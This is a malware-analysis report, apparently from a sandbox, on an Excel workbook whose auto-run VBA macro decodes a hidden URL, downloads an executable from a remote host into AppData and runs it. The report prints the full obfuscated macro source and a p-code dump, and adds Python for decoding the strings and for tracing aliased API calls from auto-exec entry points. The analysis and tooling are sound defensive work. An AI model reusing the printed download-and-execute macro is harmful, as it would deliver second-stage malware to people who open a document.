MALICIOUS
Risk Score: 276
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1105 Ingress Tool Transfer
The sample is an Excel document containing VBA macros that run automatically when the workbook is opened: the Workbook_Open event handler calls the obfuscated Sub MLoVnY. The macro imports URLDownloadToFileA from urlmon under a randomized local name (DDBGe) and ShellExecuteA from shell32.dll under another (BIYzzPFHzYBg), so the real API names appear only in the Alias clauses of the Declare statements. Both the download URL and the output filename are stored as obfuscated literals and recovered at runtime by a Decrypt() routine that reverses the string and subtracts one from every character code. The URL literal 'fyf/`efohjT`ltcwvzR0psf{0mq/{jc/eqvujyjnfmjo00;tquui' is the encrypted form; it decodes to hxxps://nilemixitupd[.]biz[.]pl/zero/Qyuvbsk_Signed_.exe. The filename literal 'fyf/xxdd' decodes to ccww.exe, so the payload is written to %AppData%\ccww.exe and then launched via ShellExecuteA with the "open" verb. Xls.Dropper.Agent-9337433-0 is the ClamAV signature that matched the document, not the name of the dropped file. The document therefore acts as a dropper for a second-stage executable fetched from the remote host.
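The Decrypt() routine in the extracted script is simple enough to reimplement, and doing so recovers the indicators without executing the macro. The Python below is an added example, not code from the sample or from the analyzer: it mirrors the routine (StrReverse, then Chr(Asc(x) - 1) per character), applies it to the two literals copied from the macro, and defangs the resulting URL for reporting. The defang() helper and the recover_iocs() wrapper are this example's own additions.

```python
"""Re-implementation of the macro's Decrypt() routine (added example, not
code from the analysis page or from the sample).

The VBA Decrypt() shown in the extracted script does two things:
  1. StrReverse(enc)            reverse the string
  2. Chr(Asc(x) - 1) per char   shift every character code down by one
"""
import re

# Literals passed to Decrypt() in SiloKkbook.MLoVnY (copied from the macro).
ENC_FILENAME = "fyf/xxdd"
ENC_URL = "fyf/`efohjT`ltcwvzR0psf{0mq/{jc/eqvujyjnfmjo00;tquui"


def vba_decrypt(enc: str) -> str:
    """Mirror of the macro's Decrypt(): StrReverse, then Asc()-1 per char."""
    return "".join(chr(ord(c) - 1) for c in reversed(enc))


def vba_encrypt(plain: str) -> str:
    """Inverse of vba_decrypt(): confirms a recovered plaintext round-trips
    to the literal seen in the macro (useful when hand-checking a decode)."""
    return "".join(chr(ord(c) + 1) for c in reversed(plain))


def defang(url: str) -> str:
    """Defang a recovered URL so it cannot be clicked from a report
    (hxxp scheme, [.] in the host only). Example helper, not from the page."""
    url = re.sub(r"^http", "hxxp", url, flags=re.IGNORECASE)
    scheme, sep, rest = url.partition("://")
    host, slash, path = rest.partition("/")
    return scheme + sep + host.replace(".", "[.]") + slash + path


def recover_iocs() -> dict:
    """Decode both literals exactly as the macro does at runtime."""
    url = vba_decrypt(ENC_URL)
    return {
        "dropped_filename": vba_decrypt(ENC_FILENAME),
        "url": url,
        "url_defanged": defang(url),
    }


if __name__ == "__main__":
    for key, value in recover_iocs().items():
        print(f"{key}: {value}")
```

Because the transform is a fixed reversal plus a constant shift, any other literal handed to this Decrypt() in related samples can be decoded the same way; re-encoding the plaintext with vba_encrypt() and comparing it to the literal is a quick sanity check that the shift direction was read correctly.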
Heuristics (8)
- ClamAV: Xls.Dropper.Agent-9337433-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Xls.Dropper.Agent-9337433-0
- Reference to URLDownloadToFile API [critical, SC_STR_URLDOWNLOAD]: Reference to URLDownloadToFile API
- VBA macros detected [medium, OLE_VBA_MACROS, 3 related findings]: Document contains VBA macro code
- URLDownloadToFile in VBA [critical, OLE_VBA_DOWNLOAD]: URLDownloadToFile in VBA. Matched line in script:
  Private Declare Function DDBGe Lib "urlmon" Alias _ "URLDownloadToFileA" (ByVal lsWjjyCFxVleNvySvzNKt As Long, ByVal GggHPcEXDbtStEyQAWGRW As String, _ ByVal TfwKSTdBvYbHN As String, ByVal hpfKFGEJuBIY As Long, ByVal zzPFH As Long) As Long
- Workbook_Open macro [low, OLE_VBA_WBOPEN]: Workbook_Open macro. Matched line in script:
  Sub Workbook_Open()
- Environ() call (env variable access) [low, OLE_VBA_ENVIRON]: Environ() call (env variable access). Matched line in script:
  CnmYhjuikolpMNBVCXzaqswdefrVtbyhyujmhgffvbJolP = Environ$("AppData") & "\" & eMjuikLOpnBVcxZASDewqsdfgthyUjKMLOploiujHBnHYTgfrfvcDEsxdfgbHNM
- Reference to ShellExecute API [high, SC_STR_SHELLEXEC]: Reference to ShellExecute API
- Macro/content-enable lure [medium, SE_ENABLE_LURE]: Document instructs the user to enable macros or editing, a common technique used by malware droppers to bypass Office macro security settings
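The heuristics above key on the API names, but in this sample those names occur only in the Alias clauses of the Declare statements; the call sites use the randomized local names DDBGe and BIYzzPFHzYBg, so a plain string match shows that the import exists but not where it is invoked or whether an auto-exec entry point reaches it. The Python below is an added example, not the analyzer's own logic: it resolves Declare aliases to the exported API, attributes each call site to the real API, and walks the call graph from Workbook_Open and similar entry points. SAMPLE_VBA is a constructed, shortened imitation of the extracted macro, and the severity table and AUTOEXEC set are this example's own choices.

```python
"""Alias-aware scan of extracted VBA for imported-API indicators.

Added example (not from the analysis page or any analyzer). Resolves each
Declare's local name to its exported API, attributes call sites to that API
and marks whether an auto-exec procedure reaches the call.
"""
import re

# Constructed, shortened imitation of the extracted macro; not the sample verbatim.
SAMPLE_VBA = r'''
Private Declare Function BIYzzPFHzYBg Lib "shell32.dll" Alias _
    "ShellExecuteA" (ByVal a As Long, ByVal b As String) As Long
Private Declare Function DDBGe Lib "urlmon" Alias _
    "URLDownloadToFileA" (ByVal a As Long, ByVal b As String) As Long
Sub MLoVnY()
    Dim p As String
    p = Environ$("AppData") & "\" & Decrypt("fyf/xxdd")
    DDBGe 0, Decrypt("..."), p, 0, 0
    BIYzzPFHzYBg 0, "open", p, "", vbNullString, vbNormalFocus
End Sub
Sub Workbook_Open()
    MLoVnY
End Sub
'''

# Exported API names worth flagging, with the severity the report assigns them.
SUSPICIOUS_APIS = {
    "URLDownloadToFileA": "critical",
    "URLDownloadToFileW": "critical",
    "ShellExecuteA": "high",
    "ShellExecuteW": "high",
}
# Procedures Office runs as soon as macros are enabled (example's own list).
AUTOEXEC = {"Workbook_Open", "Auto_Open", "Document_Open", "AutoOpen"}

DECLARE_RE = re.compile(
    r'Declare\s+(?:PtrSafe\s+)?(?:Function|Sub)\s+(\w+)\s+Lib\s+"([^"]+)"'
    r'(?:\s+Alias\s+"([^"]+)")?', re.IGNORECASE)
PROC_RE = re.compile(r'^\s*(?:Private\s+|Public\s+)?(?:Sub|Function)\s+(\w+)',
                     re.IGNORECASE)
IDENT_RE = re.compile(r'\b[A-Za-z_]\w*\b')


def join_continuations(src):
    """Merge VBA ' _' line continuations so each statement is one line."""
    lines, buf = [], ""
    for raw in src.splitlines():
        line = raw.rstrip()
        if line.endswith(" _"):
            buf += line[:-1]
            continue
        lines.append(buf + line)
        buf = ""
    if buf:
        lines.append(buf)
    return lines


def resolve_declares(lines):
    """Map each local Declare name to (library, exported API name)."""
    table = {}
    for line in lines:
        m = DECLARE_RE.search(line)
        if m:
            local, lib, alias = m.groups()
            table[local] = (lib, alias or local)  # no Alias: local name is the export
    return table


def scan(src):
    """Attribute call sites to real APIs and mark auto-exec reachability."""
    lines = join_continuations(src)
    imports = resolve_declares(lines)
    calls = {}          # procedure -> identifiers referenced in its body
    findings, proc = [], None
    for no, line in enumerate(lines, 1):
        if DECLARE_RE.search(line):
            continue
        head = PROC_RE.match(line)
        if head:
            proc = head.group(1)
            calls.setdefault(proc, set())
            continue
        if proc is None:
            continue
        idents = set(IDENT_RE.findall(line))
        calls[proc] |= idents
        for local in sorted(idents & set(imports)):
            lib, api = imports[local]
            if api in SUSPICIOUS_APIS:
                findings.append({"line": no, "proc": proc, "local_name": local,
                                 "library": lib, "api": api,
                                 "severity": SUSPICIOUS_APIS[api]})
    # Walk the call graph from every auto-exec entry point.
    reach, stack = set(), [p for p in calls if p in AUTOEXEC]
    while stack:
        p = stack.pop()
        if p not in reach:
            reach.add(p)
            stack.extend(c for c in calls[p] if c in calls)
    for f in findings:
        f["autoexec_reachable"] = f["proc"] in reach
    return {"imports": imports, "findings": findings,
            "autoexec_entry": sorted(p for p in calls if p in AUTOEXEC)}


if __name__ == "__main__":
    for f in scan(SAMPLE_VBA)["findings"]:
        print(f)
```

Run against the real macros.bas carved above, the same logic reports DDBGe as urlmon!URLDownloadToFileA and BIYzzPFHzYBg as shell32.dll!ShellExecuteA, both invoked from MLoVnY, which Workbook_Open calls directly; that chain is what turns the individual heuristics into a dropper verdict.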
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6798 bytes | 26c97b14415416399a8312a7194dc8a22a6b777d5a0afd7d53779bde5e1542a1 |

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "Module1"
Sub Sib()
End Sub
Attribute VB_Name = "SiloKkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Declare Function BIYzzPFHzYBg Lib "shell32.dll" Alias _
"ShellExecuteA" (ByVal zYBgeLAULCPbJIwwXgsUoT As Long, ByVal sJVJHBTQnWiokvMNjkuR As String, _
ByVal ycrXexFvbVWUZKE As String, ByVal LpQBRVXPpRwhdQm As String, ByVal cShrZZMzZwJXEVIMmZXRkh As String, ByVal DZyEALOezAKT As Long) As Long
Private Declare Function DDBGe Lib "urlmon" Alias _
"URLDownloadToFileA" (ByVal lsWjjyCFxVleNvySvzNKt As Long, ByVal GggHPcEXDbtStEyQAWGRW As String, _
ByVal TfwKSTdBvYbHN As String, ByVal hpfKFGEJuBIY As Long, ByVal zzPFH As Long) As Long
Sub MLoVnY()
Dim BcthYUjKmIOlPVCDrfvgTRewSQaZxSdfFRtyuIkiopmn As String
Dim eMjuikLOpnBVcxZASDewqsdfgthyUjKMLOploiujHBnHYTgfrfvcDEsxdfgbHNM As String
Dim CnmYhjuikolpMNBVCXzaqswdefrVtbyhyujmhgffvbJolP As String
Dim cFgTbNhjukioplmnbvcxzASDFghJUYHGtRfehrOlPlmJNHgthyui As String
Dim QyhndwsxeOlpokmnjHyhgtRfcvdefThyujOlpKMJuhyVbNc As String
Dim DbghyhujikolpokmNHghDDeWqaZXSXCDvetyrtghjuikdfvrtyJD As String
eMjuikLOpnBVcxZASDewqsdfgthyUjKMLOploiujHBnHYTgfrfvcDEsxdfgbHNM = Decrypt("fyf/xxdd")
CnmYhjuikolpMNBVCXzaqswdefrVtbyhyujmhgffvbJolP = Environ$("AppData") & "\" & eMjuikLOpnBVcxZASDewqsdfgthyUjKMLOploiujHBnHYTgfrfvcDEsxdfgbHNM
BcthYUjKmIOlPVCDrfvgTRewSQaZxSdfFRtyuIkiopmn = Decrypt("fyf/`efohjT`ltcwvzR0psf{0mq/{jc/eqvujyjnfmjo00;tquui")
DDBGe 0, BcthYUjKmIOlPVCDrfvgTRewSQaZxSdfFRtyuIkiopmn, CnmYhjuikolpMNBVCXzaqswdefrVtbyhyujmhgffvbJolP, 0, 0
BIYzzPFHzYBg 0, "open", CnmYhjuikolpMNBVCXzaqswdefrVtbyhyujmhgffvbJolP, "", vbNullString, vbNormalFocus
End Sub
Sub Workbook_Open()
MLoVnY
End Sub
Function Decrypt(enc)
Dim x, m_
Dim AppData, daor As Variant
enc = StrReverse(enc)
For m = 1 To Len(enc)
x = Mid(enc, m, 1)
AppData = AppData & Chr(Asc(x) - 1)
Next
Decrypt = AppData
For d = 1 To Len(doar)
doar = ""
Next
End Function
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Processing file: /tmp/qstore_dvbsbmbi
' ===============================================================================
' Module streams:
' _VBA_PROJECT_CUR/VBA/Module1 - 950 bytes
' Line #0:
' FuncDefn (Sub sJVJHBTQnWiokvMNjkuR())
' Line #1:
' Line #2:
' EndSub
' _VBA_PROJECT_CUR/VBA/SiloKkbook - 4446 bytes
' Line #0:
' LineCont 0x0008 07 00 00 00 13 00 00 00
' FuncDefn (Private Declare Function LpQBRVXPpRwhdQm Lib "TfwKSTdBvYbHN" (ByVal cShrZZMzZwJXEVIMmZXRkh As Long, ByVal DZyEALOezAKT As String, ByVal shell32.dll As String, ByVal DDBGe As String, ByVal lsWjjyCFxVleNvySvzNKt As String, ByVal GggHPcEXDbtStEyQAWGRW As Long) As Long)
' Line #1:
' Line #2:
' LineCont 0x0008 07 00 00 00 13 00 00 00
' FuncDefn (Private Declare Function hpfKFGEJuBIY Lib "CnmYhjuikolpMNBVCXzaqswdefrVtbyhyujmhgffvbJolP" (ByVal zzPFH As Long, ByVal urlmon As String, ByVal MLoVnY As String, ByVal BcthYUjKmIOlPVCDrfvgTRewSQaZxSdfFRtyuIkiopmn As Long, ByVal eMjuikLOpnBVcxZASDewqsdfgthyUjKMLOploiujHBnHYTgfrfvcDEsxdfgbHNM As Long) As Long)
' Line #3:
' Line #4:
' FuncDefn (Sub cFgTbNhjukioplmnbvcxzASDFghJUYHGtRfehrOlPlmJNHgthyui())
' Line #5:
' Dim
' VarDefn QyhndwsxeOlpokmnjHyhgtRfcvdefThyujOlpKMJuhyVbNc (As String)
' Line #6:
' Dim
' VarDefn DbghyhujikolpokmNHghDDeWqaZXSXCDvetyrtghjuikdfvrtyJD (As String)
' Line #7:
' Dim
' VarDefn Decrypt (As String)
' Line #8:
' Dim
' VarDefn Environ (As String)
' Line #9:
' Dim
' VarDefn vbNullString (As String)
' Line #10:
' Dim
' VarDefn vbNormalFocus (As String)
' Line #11:
' Line #12:
' LitStr 0x0008 "fyf/xxdd"
' ArgsLd Workbook_Open 0x0001
' St DbghyhujikolpokmNHghDDeWqaZXSXCDvetyrtghjuikdfvrtyJD
' Line #13:
' Line #14:
' LitStr 0x0007 "AppData"
' ArgsLd enc$ 0x0001
' LitStr 0x0001 "\"
' Concat
' Ld DbghyhujikolpokmNHghDDeWqaZXSXCDvetyrtghjuikdfvrtyJD
' Concat
' St Decrypt
' Line #15:
' Line #16:
' Line #17:
' LitStr 0x0034 "fyf/`efohjT`ltcwvzR0psf{0mq/{jc/eqvujyjnfmjo00;tquui"
' ArgsLd Workbook_Open 0x0001
' St QyhndwsxeOlpokmnjHyhgtRfcvdefThyujOlpKMJuhyVbNc
' Line #18:
' Line #19:
' LitDI2 0x0000
' Ld QyhndwsxeOlpokmnjHyhgtRfcvdefThyujOlpKMJuhyVbNc
' Ld Decrypt
' LitDI2 0x0000
' LitDI2 0x0000
' ArgsCall hpfKFGEJuBIY 0x0005
' Line #20:
' LitDI2 0x0000
' LitStr 0x0004 "open"
' Ld Decrypt
' LitStr 0x0000 ""
' Ld x
' Ld m_
' ArgsCall LpQBRVXPpRwhdQm 0x0006
' Line #21:
' EndSub
' Line #22:
' Line #23:
' FuncDefn (Sub AppData())
' Line #24:
' Line #25:
' ArgsCall cFgTbNhjukioplmnbvcxzASDFghJUYHGtRfehrOlPlmJNHgthyui 0x0000
' Line #26:
' EndSub
' Line #27:
' Line #28:
' Line #29:
' FuncDefn (Function Workbook_Open(daor, id_FFFE As Variant))
' Line #30:
' Dim
' VarDefn StrReverse
' VarDefn m
' Line #31:
' Dim
' VarDefn Chr
' VarDefn Asc (As Variant)
' Line #32:
' Ld daor
' ArgsLd d 0x0001
' St daor
' Line #33:
' StartForVariable
' Ld doar
' EndForVariable
' LitDI2 0x0001
' Ld daor
' FnLen
' For
' Line #34:
' Ld daor
' Ld doar
' LitDI2 0x0001
' ArgsLd Mid 0x0003
' St StrReverse
' Line #35:
' Ld Chr
' Ld StrReverse
' ArgsLd Sheet2 0x0001
' LitDI2 0x0001
' Sub
' ArgsLd Sheet1 0x0001
' Concat
' St Chr
' Line #36:
' StartForVariable
' Next
' Line #37:
' Ld Chr
' St Workbook_Open
' Line #38:
' StartForVariable
' Ld Sheet3
' EndForVariable
' LitDI2 0x0001
' Ld Workbook
' FnLen
' For
' Line #39:
' LitStr 0x0000 ""
' St Workbook
' Line #40:
' StartForVariable
' Next
' Line #41:
' EndFunc
' Line #42:
' _VBA_PROJECT_CUR/VBA/Sheet1 - 977 bytes
' _VBA_PROJECT_CUR/VBA/Sheet2 - 977 bytes
' _VBA_PROJECT_CUR/VBA/Sheet3 - 977 bytes